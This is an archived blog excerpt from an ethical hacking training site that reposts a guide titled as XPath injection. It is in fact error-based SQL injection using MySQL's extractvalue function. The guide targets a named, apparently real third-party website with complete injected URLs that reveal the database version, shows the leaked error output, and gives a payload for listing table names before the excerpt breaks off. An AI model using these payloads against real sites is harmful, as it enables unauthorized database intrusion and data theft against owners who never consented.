Daily Archives: July 28, 2016

XPath Injection Practical Approach Guide

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

XPath Injection guide

Credits: Brother Downfall

Extract Value

I’ll be using this site as an example.

Code:
http://leadacidbatteryinfo.org/newsdetail.php?id=51

Version (ExtractValue)

Code:
+and+extractvalue(rand(),concat(0x7e,version()))–

This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))–

 

Code:
XPATH syntax error: ‘~5.1.52-log’

You should get your version.

Getting The Tables (Extract Value)

Code:
+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))–

My link […]

By |July 28th, 2016|XPath Injection|